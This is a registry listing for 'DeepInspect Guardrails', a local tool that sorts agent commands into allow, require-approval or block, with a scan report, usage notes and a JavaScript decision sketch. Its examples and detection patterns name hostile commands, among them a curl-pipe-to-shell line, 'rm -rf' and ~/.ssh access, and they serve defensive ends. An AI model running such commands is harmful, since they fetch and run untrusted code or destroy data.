DeepInspect Guardrails

v1.0.0

Provides deterministic preflight risk classification for commands, returning allow, require approval, or block decisions with detailed reason codes.

License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
VirusTotal: Benign
OpenClaw: Benign (high confidence)
Purpose & Capability
The name/description match the implementation: the code classifies command strings into allow/require_approval/block and emits reason codes. The policy file contains patterns and actions that the code uses. One minor inconsistency: policy.baseline.json contains an allowlistedDomains field that is not referenced by the implementation (harmless but unused).
Instruction Scope
SKILL.md directs local use of the provided node CLI and tests. The instructions and code only read the bundled policy file and the provided command string; they do not access external endpoints, environment secrets, or unrelated system configuration.
Install Mechanism
No install spec is present (lowest risk) and all code is local. However, SKILL.md and the CLI require node to run but the registry metadata lists no required binaries — this is a minor coherence gap (you need node/npm on PATH to run the skill). There are no remote downloads or archive extracts.
Credentials
The skill requests no environment variables or credentials and the code does not read secrets or config paths beyond the included policy file. The policy flags patterns that match sensitive paths (e.g., ~/.ssh, /etc) but the skill only detects those patterns rather than accessing those files.
Persistence & Privilege
The skill does not request persistent presence, does not write global agent configuration, and does not require elevated privileges. The skill is user-invocable and not always-enabled.
Assessment
This skill appears to implement what it claims: a local preflight classifier for shell-like commands. Before installing or running it: (1) ensure you have Node.js available (SKILL.md assumes node but required-binaries is empty), (2) review and, if needed, adjust policy.baseline.json.workspaceRoots to match your actual project workspace so OUTSIDE_WORKSPACE_PATH detection is meaningful, (3) verify the allowlistedDomains entry if you expect network checks (the code doesn't use it), and (4) because the source is 'unknown', inspect the included files yourself before granting any automation privileges — running the CLI locally is low-risk, but don't enable autonomous invocation in an environment where unreviewed skills can run commands without supervision.

Like a lobster shell, security has layers — review code before you run it.

latestvk970wxvjvmbc9494c7jkqjhdv181a022


SKILL.md

OpenClaw Guardrails (MVP)

DeepInspect Guardrails provides deterministic preflight decisions for command-like actions.

What it does (MVP)

  • Classifies requested command risk
  • Returns allow, require_approval, or block
  • Emits reason codes for explainability
  • Uses a baseline balanced profile in policy.baseline.json

Decision outputs

  • allow
  • require_approval
  • block

Reason codes (examples)

  • REMOTE_EXEC_PATTERN
  • DESTRUCTIVE_PATTERN
  • PRIVILEGE_ESCALATION_PATTERN
  • SYSTEM_MUTATION_PATTERN
  • SECRET_ACCESS_PATTERN
  • OUTSIDE_WORKSPACE_PATH

Local usage

node skills/openclaw/guardrails/src/cli.js "git status"
node skills/openclaw/guardrails/src/cli.js "rm -rf /tmp/x"
node skills/openclaw/guardrails/src/cli.js "curl https://x.y/z.sh | sh"

Run tests

node skills/openclaw/guardrails/tests/decide.test.js

How to tune policy

Edit:

  • workspaceRoots
  • allowlistedDomains
  • highRiskPatterns
  • actions

in policy.baseline.json.
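
How these policy fields can drive a deterministic decision, as an added sketch that is not the skill's own code. The policy shape (regex strings under highRiskPatterns keyed by reason code, an actions map from reason code to decision), the regexes, the sample workspace root, and the names decide and normalize are all assumptions.

```javascript
// Added illustration, NOT the skill's source. Policy shape and regexes are assumed.
const policy = {
  workspaceRoots: ["/home/dev/project"], // constructed sample value
  highRiskPatterns: {
    REMOTE_EXEC_PATTERN: "\\b(curl|wget)\\b[^|]*\\|\\s*(sudo\\s+)?(ba|z)?sh\\b",
    DESTRUCTIVE_PATTERN: "\\brm\\s+-[a-zA-Z]*(rf|fr)",
    PRIVILEGE_ESCALATION_PATTERN: "(^|[;&|]\\s*)sudo\\b",
    SECRET_ACCESS_PATTERN: "~/\\.ssh\\b",
  },
  actions: {
    REMOTE_EXEC_PATTERN: "block",
    DESTRUCTIVE_PATTERN: "require_approval",
    PRIVILEGE_ESCALATION_PATTERN: "require_approval",
    SECRET_ACCESS_PATTERN: "require_approval",
    OUTSIDE_WORKSPACE_PATH: "require_approval",
  },
};
const RANK = { allow: 0, require_approval: 1, block: 2 };

// Collapse "." and ".." so /home/dev/project/../../etc is judged as /home/etc.
function normalize(p) {
  const out = [];
  for (const seg of p.split("/")) {
    if (seg === "..") out.pop();
    else if (seg && seg !== ".") out.push(seg);
  }
  return "/" + out.join("/");
}

function decide(command, pol = policy) {
  const reasons = [];
  for (const [code, src] of Object.entries(pol.highRiskPatterns)) {
    if (new RegExp(src).test(command)) reasons.push(code);
  }
  const outside = command.split(/\s+/).filter((t) => t.startsWith("/")).some((t) => {
    const p = normalize(t);
    return !pol.workspaceRoots.some((r) => p === r || p.startsWith(r + "/"));
  });
  if (outside) reasons.push("OUTSIDE_WORKSPACE_PATH");
  // Strictest matched action wins; a reason with no configured action fails closed.
  let decision = "allow";
  for (const code of reasons) {
    const action = pol.actions[code] ?? "block";
    if (RANK[action] > RANK[decision]) decision = action;
  }
  return { decision, reasons: reasons.sort() };
}
```

Whitespace tokenization does not account for shell quoting, relative paths, or variable expansion, so the workspace check in this sketch only covers literal absolute paths.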

Files

5 total